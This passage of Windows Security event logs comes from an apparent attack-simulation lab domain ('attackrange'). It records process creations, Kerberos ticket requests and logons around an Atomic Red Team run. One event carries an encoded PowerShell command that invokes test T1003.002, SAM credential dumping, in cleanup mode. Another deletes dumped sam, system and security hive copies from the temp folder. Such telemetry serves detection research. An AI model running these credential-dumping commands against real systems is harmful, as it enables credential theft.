Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:24 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258105
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x57048D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xcf8
	New Process Name:	C:\Windows\System32\HOSTNAME.EXE
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1348
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\system32\HOSTNAME.EXE"

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:24 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258104
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x57048D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1348
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xa98
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEMAbABlAGEAbgB1AHAA

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:24 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=258103
Keywords=Audit Success
Message=Special privileges assigned to new logon.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x574157

Privileges:		SeSecurityPrivilege
			SeTakeOwnershipPrivilege
			SeLoadDriverPrivilege
			SeBackupPrivilege
			SeRestorePrivilege
			SeDebugPrivilege
			SeSystemEnvironmentPrivilege
			SeEnableDelegationPrivilege
			SeImpersonatePrivilege
			SeDelegateSessionUserImpersonatePrivilege
03/12/2021 10:48:24 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=258102
Keywords=Audit Success
Message=An account was successfully logged on.

Subject:
	Security ID:		NT AUTHORITY\NETWORK SERVICE
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E4

Logon Information:
	Logon Type:		3
	Restricted Admin Mode:	-
	Virtual Account:		No
	Elevated Token:		Yes

Impersonation Level:		Impersonation

New Logon:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x574157
	Linked Logon ID:		0x0
	Network Account Name:	-
	Network Account Domain:	-
	Logon GUID:		{00D6810A-2734-CE80-3861-3A463340025F}

Process Information:
	Process ID:		0x534
	Process Name:		C:\Windows\System32\svchost.exe

Network Information:
	Workstation Name:	WIN-DC-725
	Source Network Address:	-
	Source Port:		-

Detailed Authentication Information:
	Logon Process:		Advapi  
	Authentication Package:	Negotiate
	Transited Services:	-
	Package Name (NTLM only):	-
	Key Length:		0

This event is generated when a logon session is created. It is generated on the computer that was accessed.

The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.

The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).

The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.

The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.

The impersonation level field indicates the extent to which a process in the logon session can impersonate.

The authentication information fields provide detailed information about this specific logon request.
	- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
	- Transited services indicate which intermediate services have participated in this logon request.
	- Package name indicates which sub-protocol was used among the NTLM protocols.
	- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
03/12/2021 10:48:24 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4648
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=258101
Keywords=Audit Success
Message=A logon was attempted using explicit credentials.

Subject:
	Security ID:		NT AUTHORITY\NETWORK SERVICE
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E4
	Logon GUID:		{00000000-0000-0000-0000-000000000000}

Account Whose Credentials Were Used:
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon GUID:		{00D6810A-2734-CE80-3861-3A463340025F}

Target Server:
	Target Server Name:	localhost
	Additional Information:	localhost

Process Information:
	Process ID:		0x534
	Process Name:		C:\Windows\System32\svchost.exe

Network Information:
	Network Address:	-
	Port:			-

This event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.
03/12/2021 10:48:24 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4769
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Kerberos Service Ticket Operations
OpCode=Info
RecordNumber=258100
Keywords=Audit Success
Message=A Kerberos service ticket was requested.

Account Information:
	Account Name:		Administrator@ATTACKRANGE.LOCAL
	Account Domain:		ATTACKRANGE.LOCAL
	Logon GUID:		{00D6810A-2734-CE80-3861-3A463340025F}

Service Information:
	Service Name:		WIN-DC-725$
	Service ID:		ATTACKRANGE\WIN-DC-725$

Network Information:
	Client Address:		::1
	Client Port:		0

Additional Information:
	Ticket Options:		0x40810000
	Ticket Encryption Type:	0x12
	Failure Code:		0x0
	Transited Services:	-

This event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.

This event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.

Ticket options, encryption types, and failure codes are defined in RFC 4120.
03/12/2021 10:48:24 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4768
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Kerberos Authentication Service
OpCode=Info
RecordNumber=258099
Keywords=Audit Success
Message=A Kerberos authentication ticket (TGT) was requested.

Account Information:
	Account Name:		Administrator
	Supplied Realm Name:	ATTACKRANGE
	User ID:			ATTACKRANGE\Administrator

Service Information:
	Service Name:		krbtgt
	Service ID:		ATTACKRANGE\krbtgt

Network Information:
	Client Address:		::1
	Client Port:		0

Additional Information:
	Ticket Options:		0x40810010
	Result Code:		0x0
	Ticket Encryption Type:	0x12
	Pre-Authentication Type:	2

Certificate Information:
	Certificate Issuer Name:		
	Certificate Serial Number:	
	Certificate Thumbprint:		

Certificate information is only provided if a certificate was used for pre-authentication.

Pre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.
03/12/2021 10:48:24 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258098
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x57048D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xf04
	New Process Name:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xa24
	Creator Process Name:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
	Process Command Line:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESC479.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSCF15F3DEDB853481D858B3F4A761EF1CF.TMP"

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:24 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258097
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x57048D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xa24
	New Process Name:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xa98
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\s1peraoc.cmdline"

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:25 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258112
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x57048D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xc2c
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1348
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {} 

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:25 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258111
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x57048D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x110c
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1348
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\system32\cmd.exe" /c "del" 

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:25 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258110
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x57048D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xa08
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1348
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\system32\cmd.exe" /c "" 

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:25 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258109
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x57048D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xf3c
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1348
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\system32\cmd.exe" /c "del %temp%\sam >nul 2> nul & del %temp%\system >nul 2> nul & del %temp%\security >nul 2> nul" 

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:25 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258108
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x57048D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1330
	New Process Name:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x50c
	Creator Process Name:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
	Process Command Line:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESC841.tmp" "c:\Users\Administrator\AppData\Local\Temp\e244sufx\CSC7C1C5E358814488FB42F9E9A7257837.TMP"

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:25 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258107
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x57048D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x50c
	New Process Name:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1348
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\e244sufx\e244sufx.cmdline"

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:26 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=258129
Keywords=Audit Success
Message=An account was logged off.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x579153

Logon Type:			3

This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
03/12/2021 10:48:26 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=258128
Keywords=Audit Success
Message=An account was logged off.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x57048D

Logon Type:			3

This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
03/12/2021 10:48:26 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=258127
Keywords=Audit Success
Message=An account was logged off.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x570E33

Logon Type:			3

This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
03/12/2021 10:48:26 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=258126
Keywords=Audit Success
Message=Special privileges assigned to new logon.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x579153

Privileges:		SeSecurityPrivilege
			SeTakeOwnershipPrivilege
			SeLoadDriverPrivilege
			SeBackupPrivilege
			SeRestorePrivilege
			SeDebugPrivilege
			SeSystemEnvironmentPrivilege
			SeEnableDelegationPrivilege
			SeImpersonatePrivilege
			SeDelegateSessionUserImpersonatePrivilege
03/12/2021 10:48:26 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=258125
Keywords=Audit Success
Message=An account was successfully logged on.

Subject:
	Security ID:		NT AUTHORITY\NETWORK SERVICE
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E4

Logon Information:
	Logon Type:		3
	Restricted Admin Mode:	-
	Virtual Account:		No
	Elevated Token:		Yes

Impersonation Level:		Impersonation

New Logon:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x579153
	Linked Logon ID:		0x0
	Network Account Name:	-
	Network Account Domain:	-
	Logon GUID:		{340486D4-536D-DCF9-E6F4-9F3FBAC11908}

Process Information:
	Process ID:		0x534
	Process Name:		C:\Windows\System32\svchost.exe

Network Information:
	Workstation Name:	WIN-DC-725
	Source Network Address:	-
	Source Port:		-

Detailed Authentication Information:
	Logon Process:		Advapi  
	Authentication Package:	Negotiate
	Transited Services:	-
	Package Name (NTLM only):	-
	Key Length:		0

This event is generated when a logon session is created. It is generated on the computer that was accessed.

The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.

The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).

The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.

The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.

The impersonation level field indicates the extent to which a process in the logon session can impersonate.

The authentication information fields provide detailed information about this specific logon request.
	- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
	- Transited services indicate which intermediate services have participated in this logon request.
	- Package name indicates which sub-protocol was used among the NTLM protocols.
	- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
03/12/2021 10:48:26 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4648
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=258124
Keywords=Audit Success
Message=A logon was attempted using explicit credentials.

Subject:
	Security ID:		NT AUTHORITY\NETWORK SERVICE
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E4
	Logon GUID:		{00000000-0000-0000-0000-000000000000}

Account Whose Credentials Were Used:
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon GUID:		{340486D4-536D-DCF9-E6F4-9F3FBAC11908}

Target Server:
	Target Server Name:	localhost
	Additional Information:	localhost

Process Information:
	Process ID:		0x534
	Process Name:		C:\Windows\System32\svchost.exe

Network Information:
	Network Address:	-
	Port:			-

This event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.
03/12/2021 10:48:26 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4769
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Kerberos Service Ticket Operations
OpCode=Info
RecordNumber=258123
Keywords=Audit Success
Message=A Kerberos service ticket was requested.

Account Information:
	Account Name:		Administrator@ATTACKRANGE.LOCAL
	Account Domain:		ATTACKRANGE.LOCAL
	Logon GUID:		{340486D4-536D-DCF9-E6F4-9F3FBAC11908}

Service Information:
	Service Name:		WIN-DC-725$
	Service ID:		ATTACKRANGE\WIN-DC-725$

Network Information:
	Client Address:		::1
	Client Port:		0

Additional Information:
	Ticket Options:		0x40810000
	Ticket Encryption Type:	0x12
	Failure Code:		0x0
	Transited Services:	-

This event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.

This event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.

Ticket options, encryption types, and failure codes are defined in RFC 4120.
03/12/2021 10:48:26 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4768
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Kerberos Authentication Service
OpCode=Info
RecordNumber=258122
Keywords=Audit Success
Message=A Kerberos authentication ticket (TGT) was requested.

Account Information:
	Account Name:		Administrator
	Supplied Realm Name:	ATTACKRANGE
	User ID:			ATTACKRANGE\Administrator

Service Information:
	Service Name:		krbtgt
	Service ID:		ATTACKRANGE\krbtgt

Network Information:
	Client Address:		::1
	Client Port:		0

Additional Information:
	Ticket Options:		0x40810010
	Result Code:		0x0
	Ticket Encryption Type:	0x12
	Pre-Authentication Type:	2

Certificate Information:
	Certificate Issuer Name:		
	Certificate Serial Number:	
	Certificate Thumbprint:		

Certificate information is only provided if a certificate was used for pre-authentication.

Pre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.
03/12/2021 10:48:26 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
